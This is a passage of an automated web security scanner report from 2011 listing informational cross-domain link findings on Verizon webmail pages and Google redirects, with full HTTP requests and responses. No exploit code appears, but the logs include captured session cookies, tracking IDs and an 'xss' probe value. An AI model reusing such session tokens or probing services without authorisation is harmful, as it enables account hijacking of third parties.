Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; ASP.NET_SessionId=lhx45c55scwk1s45ya0xy155

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 05 Sep 2011 22:16:24 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 196673


var MooTools={'version':'1.2.4','build':'0d9113241a90b9cd5643b926795852a2026710d4'};var Native=function(options){options=options||{};var name=options.name;var legacy=options.legacy;var protect=option
...[SNIP]...
<br><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /><br>
...[SNIP]...

15.31. http://webmail.verizon.net/signin/Login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /signin/Login.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /signin/Login.jsp?src=SAM&err=1011 HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=284C4BA4247C07559CC0CBDE7C05939B; webmail_ad="ad=1"; lob=webmail; WT_FPC=id=2a58c7583c8b5978c401315268334507:lv=1315268334507:ss=1315268334507; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; amlbcookie=03

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=1"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:39:25 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:39:25 GMT
Content-Length: 19468


<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...
<td><a href="http://www.verizonwireless.com/b2c/index.html" onclick="return dcsExit('http://www.verizonwireless.com/b2c/index.html');return false;" title="Verizon Wireless">Verizon Wireless</a>
...[SNIP]...

15.32. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizonemail.net
Path:   /webmail/servlet/HttpNimletDriver

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet&site=B HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizonemail.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:41:55 GMT
Content-type: text/html
Expires: Wed, 31 Dec 1969 18:00:00 CST
Pragma: No-cache
Cache-control: no-cache
Content-Length: 21251


<html>

<head>
   <title>Verizon E-Mail</title>
<meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l
gen true for "http://web.managedmail
...[SNIP]...
<td background="../static/images/topnav_level1background.gif" align="center">
&nbsp;&nbsp;<a class="topnavl1" href="http://business.verizon.net/">Home</a>
...[SNIP]...
<td background="../static/images/topnav_level1background.gif" align="center">
&nbsp;&nbsp;<a class="topnavl1" href="http://businesshelp.verizon.net/">Help &amp; Support</a>
...[SNIP]...
<td background="../static/images/topnav_level1background.gif" align="center">
&nbsp;&nbsp;<a class="topnavl1" href="http://business.verizon.net/marketinghome/">Products &amp; Services</a>
...[SNIP]...
<td background="../static/images/topnav_level1_tabbg.gif" align="center">
&nbsp;&nbsp;<a class="topnavl1selected" href="http://business.verizon.net/tools/">Tools &amp; Resources</a>
...[SNIP]...
<td>
&nbsp;<a class="topnavl2" href="http://business.verizon.net/tools/elearning/" >E-Learning</a>
...[SNIP]...
<td>
&nbsp;<a class="topnavl2" href="http://business.verizon.net/tools/resources/" >Resources</a>
...[SNIP]...
<td>
&nbsp;<a class="topnavl2" href="http://business.verizon.net/tools/account_management/" >Account Management</a>
...[SNIP]...
<td>
&nbsp;<a class="topnavl2selected" href="http://business.verizon.net/misc/email_login.asp" >E-Mail</a>
...[SNIP]...
<td>
&nbsp;<a class="topnavl2" href="http://dslstart.verizon.net/vzn.biz/" >Advanced Web Search</a>
...[SNIP]...
</b>. Specific details will be communicated via e-mail in the coming weeks. To learn more about Google Apps for Verizon, click here: <a href="http://business.verizon.net/SMBPortalWeb/dnefaq" target="_blank">http://business.verizon.net/SMBPortalWeb/dnefaq</a>
...[SNIP]...
<td width="80" valign="top">
<a href="http://www.verizon.com" target="_blank"><img src="../static/images/footer_logo_verizon.gif" width="80" height="56" alt="Verizon - Make progress every day" border="0"/>
...[SNIP]...
<br />
<a class="footerlinks" href="http://business.verizon.net/">Home</a>
...[SNIP]...
</span>
<a class="footerlinks" href="http://businesshelp.verizon.net/">Help &amp; Support</a>
...[SNIP]...
</span>
<a class="footerlinks" href="http://business.verizon.net/marketinghome/">Products &amp; Services</a>
...[SNIP]...
</span>
<a class="footerlinks" href="http://business.verizon.net/tools/">Tools &amp; Resources</a>
...[SNIP]...
</span>
<a class="footerlinks" href="http://www22.verizon.com/ForHomeDSL/channels/dsl/forhomedsl.asp" target="_blank">For Your Home</a>
...[SNIP]...
<span class="legal">
<a href="http://business.verizon.net/policies/privacy.asp">Verizon Privacy Policy</a>
|
<a href="http://www22.verizon.com/copyright/" target="_blank">Copyright 2003 Verizon</a>
...[SNIP]...
<br />
Use of Verizon Online's Internet access services and Web sites are subject to user compliance with
our <a href="http://business.verizon.net/policies/">Policies</a>
...[SNIP]...

15.33. http://www.connecttoverizon.com/loginFailed.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /loginFailed.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268 HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=pcwhitefencecom%3D%2526pid%253DConnectToVerizon-Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.connecttoverizon.com/objects/images/spacer.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:17 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:20:17 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Failed | C
...[SNIP]...
<LINK REL="SHORTCUT ICON" HREF="http://www.connecttoverizon.com/favicon.ico">

<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/static/mrc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- mootools 1.2 with compatibility for previous version -->
<script language="JavaScript" type="text/javascript" src="http://www.whitefence.com/scripts/moo/mootools.v1.2b2.js"></script>
...[SNIP]...
<br />
<a class="lostpass" href="https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword?id=1053268&appName=otto&loginPageUrl=https://www.whitefence.com/WebObjects/WhiteFenceService.woa" target="_blank">Lost Password?
<input type=hidden value="1053268" name=id>
...[SNIP]...
<div id="trusticons">
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.WHITEFENCE.COM&lang=en" target="_blank"><img src="http://www.connecttoverizon.com/objects/images/trust/verisign.gif" alt="certified by verisign" class="trustseals"></a>
<a target="_blank" href="http://www.whitefence.com/bpcfaq/wfnetwork.html" target="_blank"><img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/poweredbywhitefence.100.png" class="trustseals"></a>
...[SNIP]...
<li><a href="http://www.connecttoatt.com" target="_blank">AT&amp;T</a></li>
<li><a href="http://www.connecttoqwest.com" target="_blank">Qwest</a></li>
<li><a href="http://www.embarqmove.com" target="_blank">EMBARQ</a></li>
<li><a href="http://www.connecttowindstream.com" target="_blank">Windstream</a>
...[SNIP]...
<li><a href="http://www.connecttocenturytel.com" target="_blank">CenturyTel</a>
...[SNIP]...
<li><a href="http://www.connecttocavalier.com" target="_blank">Cavalier</a></li>
<li class="last"><a href="http://www.connecttocincinnatibell.com" target="_blank">Cincinnati Bell</a>
...[SNIP]...
<li class="last"><a href="http://www.surveymonkey.com/s.aspx?sm=HN_2fHokPITw5_2flbeNXIdO1w_3d_3d" target="_blank">Rate this Site</a>
...[SNIP]...
<!-- SiteCatalyst code version: H.1.
Copyright 1997-2005 Omniture, Inc. More info available at http://www.omniture.com -->
<script type="text/javascript" language="Javascript" src="http://www.whitefence.com/static/omniture.js"></script>
...[SNIP]...
<noscript><img
src="http://pcwhitefencecom.112.2O7.net/b/ss/pcwhitefencecom/1/H.1--NS/
0" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

15.34. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=.verizon.com HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 112200

<!doctype html> <head> <title>.verizon.com - Google Search</title> <script>window.google={kEI:"rEplTvvzK-rhiAKM1ZCiCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=.verizon.com&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.verizon.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CEEQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:HvcASfqqhcQJ:www.verizon.com/+.verizon.com&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CEMQIDAA')">Cached</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www22.verizon.com/myverizon/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CEkQjBAwAQ')">MyVerizon 2.0</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www22.verizon.com/content/contactus/" class=l onmousedown="return clk(this,this.href,'','','','3','','0CE4QjBAwAg')">Contact Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.verizon.com/support" class=l onmousedown="return clk(this,this.href,'','','','4','','0CFMQjBAwAw')">Residential Support</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www22.verizon.com/residential/homephone/" class=l onmousedown="return clk(this,this.href,'','','','5','','0CFgQjBAwBA')">Phone</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.verizon.com/fiostv" class=l onmousedown="return clk(this,this.href,'','','','6','','0CF0QjBAwBQ')">FiOS TV</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://webmail.verizon.com/" class=l onmousedown="return clk(this,this.href,'','','','7','','0CGIQjBAwBg')">My Verizon 2.0 | Webmail</a>
...[SNIP]...
<h3 class="r"><a href="http://www.verizonwireless.com/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CGsQFjAH')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:A5a2oe7F6VwJ:www.verizonwireless.com/+.verizon.com&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CG0QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vzwcareers.com/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CHIQFjAI')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:7sclGCLvV3UJ:www.vzwcareers.com/+.verizon.com&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CHQQIDAI')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://straightsets.blogs.nytimes.com/2011/09/04/tennis-channel-pulled-from-cablevision-and-verizon-systems/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CHkQqQIwCQ')">Tennis Channel Pulled From Cablevision and <em>
...[SNIP]...
<span class=tl><a href="http://www.nytimes.com/2011/09/02/opinion/verizons-tax-bill.html" class=l onmousedown="return clk(this,this.href,'','','','11','','0CH8QqQIwCg')"><em>
...[SNIP]...
<span class=tl><a href="http://www.pcmag.com/article2/0,2817,2392347,00.asp" class=l onmousedown="return clk(this,this.href,'','','','12','','0CIUBEKkCMAs')"><em>
...[SNIP]...
<h3 class="r"><a href="http://verizonconnections.vzcomportal.com/" class=l onmousedown="return clk(this,this.href,'','','','13','','0CI0BEBYwDA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:AujoxX0bdP4J:verizonconnections.vzcomportal.com/+.verizon.com&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','13','','0CI8BECAwDA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.careersatverizonwireless.com/" class=l onmousedown="return clk(this,this.href,'','','','14','','0CJMBEBYwDQ')">Sales | Customer Service Jobs At <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:fcx5JUKZmC4J:www.careersatverizonwireless.com/+.verizon.com&amp;cd=14&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','14','','0CJYBECAwDQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://netmail.verizon.net/" class=l onmousedown="return clk(this,this.href,'','','','15','','0CJoBEBYwDg')">Welcome to <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Ows3PsSIEQoJ:netmail.verizon.net/+.verizon.com&amp;cd=15&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','15','','0CJwBECAwDg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://resources.hewitt.com/verizon/" class=l onmousedown="return clk(this,this.href,'','','','16','','0CKEBEBYwDw')"><em>
...[SNIP]...
<h3 class="r"><a href="http://phones.verizonwireless.com/htc/thunderbolt/" class=l onmousedown="return clk(this,this.href,'','','','17','','0CKQBEBYwEA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:yWFaZxHem0EJ:phones.verizonwireless.com/htc/thunderbolt/+.verizon.com&amp;cd=17&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','17','','0CKYBECAwEA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://promo.verizon.chinesesite.us.com/" class=l onmousedown="return clk(this,this.href,'','','','18','','0CKoBEBYwEQ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:hy46YmOeJBsJ:promo.verizon.chinesesite.us.com/+.verizon.com&amp;cd=18&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','18','','0CKwBECAwEQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.connecttoverizon.com/" class=l onmousedown="return clk(this,this.href,'','','','19','','0CLEBEBYwEg')">Order <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:fObhjvELd78J:www.connecttoverizon.com/+.verizon.com&amp;cd=19&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','19','','0CLMBECAwEg')">Cached</a>
...[SNIP]...
<div><a href="http://www.att.com/" class=l onmousedown="return clk(this,this.href,'','','','20','','0CLkBEKIIMBM')">AT&T</a>
...[SNIP]...
<div><a href="http://www.comcast.com/" class=l onmousedown="return clk(this,this.href,'','','','21','','0CLsBEKIIMBQ')">Comcast</a>
...[SNIP]...
<div><a href="http://www.sprint.com/" class=l onmousedown="return clk(this,this.href,'','','','22','','0CL0BEKIIMBU')">Sprint</a>
...[SNIP]...
<div><a href="http://www.qwest.com/" class=l onmousedown="return clk(this,this.href,'','','','23','','0CL8BEKIIMBY')">Qwest</a>
...[SNIP]...

15.35. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=30&ved=0CE4QFjAJOBQ&url=http%3A%2F%2Fnewscenter.verizon.com%2Ffact-sheets%2Fverizon-high-speed-internet.html&ei=Z1BlTrq0NqnjiALbl6G0Cg&usg=AFQjCNE1Cv7LYF5ETzO6gV20U9K8tA56ew HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=U1BlTuKkG8bkiAKp37G7Cg&start=20&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:12 GMT
Server: gws
Content-Length: 271
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html">here</A>
...[SNIP]...

15.36. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=18&ved=0CEUQFjAHOAo&url=http%3A%2F%2Fdeveloper.verizon.com%2Fjsps%2FdevCenters%2FSmart_Phone%2FLanding_Pages%2FAppendixICategoryDefinitions.jsp&ei=U1BlTuKkG8bkiAKp37G7Cg&usg=AFQjCNE4Pa8Pk6zX3Ndl0MUlZ4yZOE-AmQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://developer.verizon.com/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:41 GMT
Server: gws
Content-Length: 300
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://developer.verizon.com/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp">here</A>
...[SNIP]...

15.37. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=14&ved=0CCoQFjADOAo&url=http%3A%2F%2Fheadlines.verizon.com%2F&ei=U1BlTuKkG8bkiAKp37G7Cg&usg=AFQjCNGZq-jF7q0A-655hnSCWeSY7F6Ndg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://headlines.verizon.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:33 GMT
Server: gws
Content-Length: 226
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://headlines.verizon.com/">here</A>
...[SNIP]...

15.38. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=19&ved=0CEsQFjAIOAo&url=http%3A%2F%2Fforums.verizon.com%2Ft5%2FFiOS-Internet%2FNeed-webmail-contacts-CSV-titles%2Ftd-p%2F23248&ei=U1BlTuKkG8bkiAKp37G7Cg&usg=AFQjCNGz71h4jdKwUyipZeTsbjfutkBdYg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:47 GMT
Server: gws
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248">here</A>
...[SNIP]...

15.39. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=3&ved=0CCQQFjAC&url=http%3A%2F%2Fpromo.verizon.com%2Fomk%2Fonline.shtml&ei=RVBlTuSuBePmiAKx7NyXCg&usg=AFQjCNHvqkJNtly-KFKxnzY3zUj_vxqEBg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#sclient=psy&hl=en&source=hp&q=site:verizon.com+online+news+webmail&pbx=1&oq=site:verizon.com+online+news+webmail&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4585l6285l1l6781l2l2l0l0l0l0l144l261l0.2l2l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
